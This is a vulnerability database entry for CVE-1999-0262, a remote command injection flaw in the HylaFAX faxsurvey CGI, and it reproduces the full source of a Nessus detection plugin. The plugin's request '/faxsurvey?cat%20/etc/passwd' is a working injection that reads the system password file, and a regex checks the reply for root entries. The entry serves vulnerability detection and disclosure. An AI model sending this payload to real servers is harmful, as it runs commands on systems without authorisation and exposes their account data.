Vulnerabilities > CVE-1999-0262 - Unspecified vulnerability in Renaud Deraison Faxsurvey

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
renaud-deraison
nessus
exploit available

Summary

Hylafax faxsurvey CGI script on Linux allows remote attackers to execute arbitrary commands via shell metacharacters in the query string.

Vulnerable Configurations

Part Description Count
Application
Renaud_Deraison
1

Exploit-Db

descriptionHylafax 4.0 pl2 Faxsurvey Remote Command Execution Vulnerability. CVE-1999-0262. Remote exploit for unix platform
idEDB-ID:20462
last seen2016-02-02
modified1998-08-04
published1998-08-04
reporterTom
sourcehttps://www.exploit-db.com/download/20462/
titleHylafax 4.0 pl2 Faxsurvey Remote Command Execution Vulnerability

Nessus

NASL familyCGI abuses
NASL idFAXSURVEY.NASL
descriptionThe
last seen2020-06-01
modified2020-06-02
plugin id10067
published1999-06-22
reporterThis script is Copyright (C) 1999-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/10067
titleHylaFAX faxsurvey Arbitrary Command Execution
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if(description)
{
 script_id(10067);
 script_version ("1.44");
 script_cve_id("CVE-1999-0262");
 script_bugtraq_id(2056);

 script_name(english:"HylaFAX faxsurvey Arbitrary Command Execution");
 script_summary(english:"Checks if faxsurvey is vulnerable");
 
 script_set_attribute( attribute:"synopsis", value:
"A web application on the remote host has an arbitrary command
execution vulnerability." );
 script_set_attribute( attribute:"description",  value:
"The 'faxsurvey' CGI does not sanitize input to the query string.  A
remote attacker could exploit this to execute arbitrary commands." );
 script_set_attribute(
   attribute:"see_also",
   value:"https://seclists.org/bugtraq/1998/Aug/2"
 );
 script_set_attribute(
   attribute:"solution", 
   value:"Remove this CGI from the server."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"plugin_publication_date", value: "1999/06/22");
 script_set_attribute(attribute:"vuln_publication_date", value: "1998/08/04");
 script_cvs_date("Date: 2018/11/15 20:50:17");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");

 script_copyright(english:"This script is Copyright (C) 1999-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");

 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80);

foreach dir (cgi_dirs())
{
 req = string(dir, "/faxsurvey?cat%20/etc/passwd");
 result = http_send_recv3(method:"GET", item:req, port:port);
 if (isnull(result)) exit(0);

 if(egrep(pattern:".*root:.*:0:[01]:.*", string:result[2]))
 {
   if (report_verbosity > 0)
   {
     result[2] = data_protection::redact_etc_passwd(output:result[2]);
     report = string(
       "\n",
       "Nessus exploited this issue by requesting the following URL :\n\n",
       "  ", build_url(qs:req, port:port), "\n"
     );

     if (report_verbosity > 1)
       report += string("\nWhich yielded :\n\n", result[2], "\n");

     security_hole(port:port, extra:report);
   }
   else security_hole(port);

   exit(0);
 }
}